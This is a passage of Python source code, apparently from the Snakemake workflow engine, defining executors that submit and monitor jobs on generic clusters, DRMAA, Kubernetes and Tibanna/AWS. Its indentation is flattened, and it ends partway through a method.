class ClusterExecutor(RealExecutor):
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote ",
"--wait-for-files {wait_for_files} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
if self.workflow.shadow_prefix:
self.exec_job += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
self.exec_job += " --use-conda "
if self.workflow.conda_prefix:
self.exec_job += " --conda-prefix {} ".format(
self.workflow.conda_prefix
)
if self.workflow.use_singularity:
self.exec_job += " --use-singularity "
if self.workflow.singularity_prefix:
self.exec_job += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
self.exec_job += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if self.workflow.use_env_modules:
self.exec_job += " --use-envmodules"
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else ""
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_for_jobs)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
wait_for_files=wait_for_files,
**kwargs
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.external_jobid = dict()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
)
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
if self.statuscmd is not None:
def job_status(job):
try:
# this command shall return "success", "failed" or "running"
return (
subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
)
.decode()
.split("\n")[0]
)
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the master process.
pass
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
else:
def job_status(job):
if os.path.exists(active_job.jobfinished):
os.remove(active_job.jobfinished)
os.remove(active_job.jobscript)
return success
if os.path.exists(active_job.jobfailed):
os.remove(active_job.jobfailed)
os.remove(active_job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
logger.debug("Checking status of {} jobs.".format(len(active_jobs)))
for active_job in active_jobs:
with self.status_rate_limiter:
status = job_status(active_job)
if status == success:
active_job.callback(active_job.job)
elif status == failed:
self.print_job_error(
active_job.job,
cluster_jobid=active_job.jobid
if active_job.jobid
else "unknown",
)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
else:
still_running.append(active_job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
SynchronousClusterJob = namedtuple(
"SynchronousClusterJob", "job jobid callback error_callback jobscript process"
)
class SynchronousClusterExecutor(ClusterExecutor):
"""
invocations like "qsub -sync y" (SGE) or "bsub -K" (LSF) are
synchronous, blocking the foreground thread and returning the
remote exit code at remote exit.
"""
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=10,
)
self.submitcmd = submitcmd
self.external_jobid = dict()
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
process = subprocess.Popen(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
SynchronousClusterJob(
job, process.pid, callback, error_callback, jobscript, process
)
)
def _wait_for_jobs(self):
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
exitcode = active_job.process.poll()
if exitcode is None:
# job not yet finished
still_running.append(active_job)
elif exitcode == 0:
# job finished successfully
os.remove(active_job.jobscript)
active_job.callback(active_job.job)
else:
# job failed
os.remove(active_job.jobscript)
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
DRMAAClusterJob = namedtuple(
"DRMAAClusterJob", "job jobid callback error_callback jobscript"
)
class DRMAAExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
drmaa_args="",
drmaa_log_dir=None,
latency_wait=3,
cluster_config=None,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
):
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
)
try:
import drmaa
except ImportError:
raise WorkflowError(
"Python support for DRMAA is not installed. "
"Please install it, e.g. with easy_install3 --user drmaa"
)
except RuntimeError as e:
raise WorkflowError("Error loading drmaa support:\n{}".format(e))
self.session = drmaa.Session()
self.drmaa_args = drmaa_args
self.drmaa_log_dir = drmaa_log_dir
self.session.initialize()
self.submitted = list()
def cancel(self):
from drmaa.const import JobControlAction
from drmaa.errors import InvalidJobException, InternalException
for jobid in self.submitted:
try:
self.session.control(jobid, JobControlAction.TERMINATE)
except (InvalidJobException, InternalException):
# This is common - logging a warning would probably confuse the user.
pass
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
jobscript = self.get_jobscript(job)
self.write_jobscript(job, jobscript)
try:
drmaa_args = job.format_wildcards(
self.drmaa_args, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule)
import drmaa
if self.drmaa_log_dir:
makedirs(self.drmaa_log_dir)
try:
jt = self.session.createJobTemplate()
jt.remoteCommand = jobscript
jt.nativeSpecification = drmaa_args
if self.drmaa_log_dir:
jt.outputPath = ":" + self.drmaa_log_dir
jt.errorPath = ":" + self.drmaa_log_dir
jt.jobName = os.path.basename(jobscript)
jobid = self.session.runJob(jt)
except (
drmaa.DeniedByDrmException,
drmaa.InternalException,
drmaa.InvalidAttributeValueException,
) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)), self.workflow.linemaps
)
error_callback(job)
return
logger.info(
"Submitted DRMAA job {} with external jobid {}.".format(job.jobid, jobid)
)
self.submitted.append(jobid)
self.session.deleteJobTemplate(jt)
submit_callback(job)
with self.lock:
self.active_jobs.append(
DRMAAClusterJob(job, jobid, callback, error_callback, jobscript)
)
def shutdown(self):
super().shutdown()
self.session.exit()
def _wait_for_jobs(self):
import drmaa
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for active_job in active_jobs:
with self.status_rate_limiter:
try:
retval = self.session.wait(
active_job.jobid, drmaa.Session.TIMEOUT_NO_WAIT
)
except drmaa.ExitTimeoutException as e:
# job still active
still_running.append(active_job)
continue
except (drmaa.InternalException, Exception) as e:
print_exception(
WorkflowError("DRMAA Error: {}".format(e)),
self.workflow.linemaps,
)
os.remove(active_job.jobscript)
active_job.error_callback(active_job.job)
continue
# job exited
os.remove(active_job.jobscript)
if (
not retval.wasAborted
and retval.hasExited
and retval.exitStatus == 0
):
active_job.callback(active_job.job)
else:
self.print_job_error(active_job.job)
self.print_cluster_job_error(
active_job, self.dag.jobid(active_job.job)
)
active_job.error_callback(active_job.job)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
@contextlib.contextmanager
def change_working_directory(directory=None):
""" Change working directory in execution context if provided. """
if directory:
try:
saved_directory = os.getcwd()
logger.info("Changing to shadow directory: {}".format(directory))
os.chdir(directory)
yield
finally:
os.chdir(saved_directory)
else:
yield
KubernetesJob = namedtuple(
"KubernetesJob", "job jobid callback error_callback kubejob jobscript"
)
class KubernetesExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
namespace,
container_image=None,
jobname="{rulename}.{jobid}",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
keepincomplete=False,
):
exec_job = (
"cp -rf /source/. . && "
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait 0 "
" --attempt {attempt} {use_threads} "
"--wrapper-prefix {workflow.wrapper_prefix} "
"{overwrite_config} {printshellcmds} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
None,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=10,
)
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.snakefile)
try:
from kubernetes import config
except ImportError:
raise WorkflowError(
"The Python 3 package 'kubernetes' "
"must be installed to use Kubernetes"
)
config.load_kube_config()
import kubernetes.client
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.namespace = namespace
self.envvars = workflow.envvars
self.secret_files = {}
self.run_namespace = str(uuid.uuid4())
self.secret_envvars = {}
self.register_secret()
self.container_image = container_image or get_container_image()
def register_secret(self):
import kubernetes.client
secret = kubernetes.client.V1Secret()
secret.metadata = kubernetes.client.V1ObjectMeta()
# create a random uuid
secret.metadata.name = self.run_namespace
secret.type = "Opaque"
secret.data = {}
for i, f in enumerate(self.workflow.get_sources()):
if f.startswith(".."):
logger.warning(
"Ignoring source file {}. Only files relative "
"to the working directory are allowed.".format(f)
)
continue
with open(f, "br") as content:
key = "f{}".format(i)
self.secret_files[key] = f
secret.data[key] = base64.b64encode(content.read()).decode()
for e in self.envvars:
try:
key = e.lower()
secret.data[key] = base64.b64encode(os.environ[e].encode()).decode()
self.secret_envvars[key] = e
except KeyError:
continue
self.kubeapi.create_namespaced_secret(self.namespace, secret)
def unregister_secret(self):
import kubernetes.client
self.kubeapi.delete_namespaced_secret(
self.run_namespace, self.namespace, body=kubernetes.client.V1DeleteOptions()
)
def shutdown(self):
self.unregister_secret()
super().shutdown()
def cancel(self):
import kubernetes.client
body = kubernetes.client.V1DeleteOptions()
with self.lock:
for j in self.active_jobs:
self.kubeapi.delete_namespaced_pod(j.jobid, self.namespace, body=body)
self.shutdown()
def run(self, job, callback=None, submit_callback=None, error_callback=None):
import kubernetes.client
super()._run(job)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads="--force-use-threads" if not job.is_group() else "",
)
# Kubernetes silently does not submit a job if the name is too long
# therefore, we ensure that it is not longer than snakejob+uuid.
jobid = "snakejob-{}".format(
get_uuid("{}-{}-{}".format(self.run_namespace, job.jobid, job.attempt))
)
body = kubernetes.client.V1Pod()
body.metadata = kubernetes.client.V1ObjectMeta(labels={"app": "snakemake"})
body.metadata.name = jobid
# container
container = kubernetes.client.V1Container(name=jobid)
container.image = self.container_image
container.command = shlex.split("/bin/sh")
container.args = ["-c", exec_job]
container.working_dir = "/workdir"
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="workdir", mount_path="/workdir")
]
container.volume_mounts = [
kubernetes.client.V1VolumeMount(name="source", mount_path="/source")
]
body.spec = kubernetes.client.V1PodSpec(containers=[container])
# fail on first error
body.spec.restart_policy = "Never"
# source files as a secret volume
# we copy these files to the workdir before executing Snakemake
too_large = [
path
for path in self.secret_files.values()
if os.path.getsize(path) > 1000000
]
if too_large:
raise WorkflowError(
"The following source files exceed the maximum "
"file size (1MB) that can be passed from host to "
"kubernetes. These are likely not source code "
"files. Consider adding them to your "
"remote storage instead or (if software) use "
"Conda packages or container images:\n{}".format("\n".join(too_large))
)
secret_volume = kubernetes.client.V1Volume(name="source")
secret_volume.secret = kubernetes.client.V1SecretVolumeSource()
secret_volume.secret.secret_name = self.run_namespace
secret_volume.secret.items = [
kubernetes.client.V1KeyToPath(key=key, path=path)
for key, path in self.secret_files.items()
]
# workdir as an emptyDir volume of undefined size
workdir_volume = kubernetes.client.V1Volume(name="workdir")
workdir_volume.empty_dir = kubernetes.client.V1EmptyDirVolumeSource()
body.spec.volumes = [secret_volume, workdir_volume]
# env vars
container.env = []
for key, e in self.secret_envvars.items():
envvar = kubernetes.client.V1EnvVar(name=e)
envvar.value_from = kubernetes.client.V1EnvVarSource()
envvar.value_from.secret_key_ref = kubernetes.client.V1SecretKeySelector(
key=key, name=self.run_namespace
)
container.env.append(envvar)
# request resources
container.resources = kubernetes.client.V1ResourceRequirements()
container.resources.requests = {}
container.resources.requests["cpu"] = job.resources["_cores"]
if "mem_mb" in job.resources.keys():
container.resources.requests["memory"] = "{}M".format(
job.resources["mem_mb"]
)
# capabilities
if job.needs_singularity and self.workflow.use_singularity:
# TODO this should work, but it doesn't currently because of
# missing loop devices
# singularity inside docker requires SYS_ADMIN capabilities
# see https://groups.google.com/a/lbl.gov/forum/#!topic/singularity/e9mlDuzKowc
# container.capabilities = kubernetes.client.V1Capabilities()
# container.capabilities.add = ["SYS_ADMIN",
# "DAC_OVERRIDE",
# "SETUID",
# "SETGID",
# "SYS_CHROOT"]
# Running in priviledged mode always works
container.security_context = kubernetes.client.V1SecurityContext(
privileged=True
)
pod = self._kubernetes_retry(
lambda: self.kubeapi.create_namespaced_pod(self.namespace, body)
)
logger.info(
"Get status with:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}".format(jobid=jobid)
)
self.active_jobs.append(
KubernetesJob(job, jobid, callback, error_callback, pod, None)
)
def _kubernetes_retry(self, func):
import kubernetes
import urllib3
with self.lock:
try:
return func()
except kubernetes.client.rest.ApiException as e:
if e.status == 401:
# Unauthorized.
# Reload config in order to ensure token is
# refreshed. Then try again.
logger.info("trying to reauthenticate")
kubernetes.config.load_kube_config()
subprocess.run(["kubectl", "get", "nodes"])
self.kubeapi = kubernetes.client.CoreV1Api()
self.batchapi = kubernetes.client.BatchV1Api()
self.register_secret()
try:
return func()
except kubernetes.client.rest.ApiException as e:
# Both attempts failed, raise error.
raise WorkflowError(
e,
"This is likely a bug in "
"https://github.com/kubernetes-client/python.",
)
# Handling timeout that may occur in case of GKE master upgrade
except urllib3.exceptions.MaxRetryError as e:
logger.info(
"Request time out! "
"check your connection to Kubernetes master"
"Workflow will pause for 5 minutes to allow any update operations to complete"
)
time.sleep(300)
try:
return func()
except:
# Still can't reach the server after 5 minutes
raise WorkflowError(
e,
"Error 111 connection timeout, please check"
" that the k8 cluster master is reachable!",
)
def _wait_for_jobs(self):
import kubernetes
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
for j in active_jobs:
with self.status_rate_limiter:
logger.debug("Checking status for pod {}".format(j.jobid))
job_not_found = False
try:
res = self._kubernetes_retry(
lambda: self.kubeapi.read_namespaced_pod_status(
j.jobid, self.namespace
)
)
except kubernetes.client.rest.ApiException as e:
if e.status == 404:
# Jobid not found
# The job is likely already done and was deleted on
# the server.
j.callback(j.job)
continue
except WorkflowError as e:
print_exception(e, self.workflow.linemaps)
j.error_callback(j.job)
continue
if res is None:
msg = (
"Unknown pod {jobid}. "
"Has the pod been deleted "
"manually?"
).format(jobid=j.jobid)
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Failed":
msg = (
"For details, please issue:\n"
"kubectl describe pod {jobid}\n"
"kubectl logs {jobid}"
).format(jobid=j.jobid)
# failed
self.print_job_error(j.job, msg=msg, jobid=j.jobid)
j.error_callback(j.job)
elif res.status.phase == "Succeeded":
# finished
j.callback(j.job)
body = kubernetes.client.V1DeleteOptions()
self.kubeapi.delete_namespaced_pod(
j.jobid, self.namespace, body=body
)
else:
# still active
still_running.append(j)
with self.lock:
self.active_jobs.extend(still_running)
sleep()
TibannaJob = namedtuple(
"TibannaJob", "job jobname jobid exec_arn callback error_callback"
)
class TibannaExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
tibanna_sfn,
precommand="",
tibanna_config=False,
container_image=None,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
local_input=None,
restart_times=None,
max_status_checks_per_second=1,
keepincomplete=False,
):
self.workflow_sources = []
for wfs in workflow.get_sources():
if os.path.isdir(wfs):
for (dirpath, dirnames, filenames) in os.walk(wfs):
self.workflow_sources.extend(
[os.path.join(dirpath, f) for f in filenames]
)
else:
self.workflow_sources.append(os.path.abspath(wfs))
log = "sources="
for f in self.workflow_sources:
log += f
logger.debug(log)
self.snakefile = workflow.snakefile
self.envvars = {e: os.environ[e] for e in workflow.envvars}
if self.envvars:
logger.debug("envvars = %s" % str(self.envvars))
self.tibanna_sfn = tibanna_sfn
if precommand:
self.precommand = precommand
else:
self.precommand = ""
self.s3_bucket = workflow.default_remote_prefix.split("/")[0]
self.s3_subdir = re.sub(
"^{}/".format(self.s3_bucket), "", workflow.default_remote_prefix
)
logger.debug("precommand= " + self.precommand)
logger.debug("bucket=" + self.s3_bucket)
logger.debug("subdir=" + self.s3_subdir)
self.quiet = quiet
exec_job = (
"snakemake {target} --snakefile {snakefile} "
"--force -j{cores} --keep-target-files --keep-remote "
"--latency-wait 0 "
"--attempt 1 {use_threads} "
"{overwrite_config} {rules} --nocolor "
"--notemp --no-hooks --nolock "
)
super().__init__(
workflow,
dag,
cores,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
local_input=local_input,
restart_times=restart_times,
exec_job=exec_job,
assume_shared_fs=False,
max_status_checks_per_second=max_status_checks_per_second,
disable_default_remote_provider_args=True,
disable_get_default_resources_args=True,
)
self.container_image = container_image or get_container_image()
self.tibanna_config = tibanna_config
def shutdown(self):
# perform additional steps on shutdown if necessary
logger.debug("shutting down Tibanna executor")
super().shutdown()
def cancel(self):
from tibanna.core import API
for j in self.active_jobs:
logger.info("killing job {}".format(j.jobname))
while True:
try:
res = API().kill(j.exec_arn)
if not self.quiet:
print(res)
break
except KeyboardInterrupt:
pass
self.shutdown()
def split_filename(self, filename, checkdir=None):
f = os.path.abspath(filename)
if checkdir:
checkdir = checkdir.rstrip("/")
if f.startswith(checkdir):
fname = re.sub("^{}/".format(checkdir), "", f)
fdir = checkdir
else:
direrrmsg = (
"All source files including Snakefile, "
+ "conda env files, and rule script files "
+ "must be in the same working directory: {} vs {}"
)
raise WorkflowError(direrrmsg.format(checkdir, f))
else:
fdir, fname = os.path.split(f)
return fname, fdir
def remove_prefix(self, s):
return re.sub("^{}/{}/".format(self.s3_bucket, self.s3_subdir), "", s)
def handle_remote(self, target):
if isinstance(target, _IOFile) and target.remote_object.provider.is_default:
return self.remove_prefix(target)
else:
return target
def add_command(self, job, tibanna_args, tibanna_config):
# snakefile, with file name remapped
snakefile_fname = tibanna_args.snakemake_main_filename
# targets, with file name remapped
targets = job.get_targets()
if not isinstance(targets, list):
targets = [targets]
targets_default = " ".join([self.handle_remote(t) for t in targets])
# use_threads
use_threads = "--force-use-threads" if not job.is_group() else ""
# format command
command = self.format_job_pattern(
self.exec_job,
job,
target=targets_default,
snakefile=snakefile_fname,
use_threads=use_threads,
cores=tibanna_config["cpu"],
)
if self.precommand:
command = self.precommand + "; " + command
logger.debug("command = " + str(command))
tibanna_args.command = command
def add_workflow_files(self, job, tibanna_args):
snakefile_fname, snakemake_dir = self.split_filename(self.snakefile)
snakemake_child_fnames = []
for src in self.workflow_sources:
src_fname, _ = self.split_filename(src, snakemake_dir)
if src_fname != snakefile_fname: # redundant
snakemake_child_fnames.append(src_fname)
# change path for config files
self.workflow.overwrite_configfiles = [
self.split_filename(cf, snakemake_dir)[0]
for cf in self.workflow.overwrite_configfiles
]
tibanna_args.snakemake_directory_local = snakemake_dir
tibanna_args.snakemake_main_filename = snakefile_fname
tibanna_args.snakemake_child_filenames = list(set(snakemake_child_fnames))
def adjust_filepath(self, f):
if not hasattr(f, "remote_object"):
rel = self.remove_prefix(f) # log/benchmark
elif (
hasattr(f.remote_object, "provider") and f.remote_object.provider.is_default
):
rel = self.remove_prefix(f)
else:
rel = f
return rel
def make_tibanna_input(self, job):
from tibanna import ec2_utils, core as tibanna_core
# input & output
# Local snakemake command here must be run with --default-remote-prefix
# and --default-remote-provider (forced) but on VM these options will be removed.
# The snakemake on the VM will consider these input and output as not remote.
# They files are transferred to the container by Tibanna before running snakemake.
# In short, the paths on VM must be consistent with what's in Snakefile.
# but the actual location of the files is on the S3 bucket/prefix.
# This mapping info must be passed to Tibanna.
for i in job.input:
logger.debug("job input " + str(i))
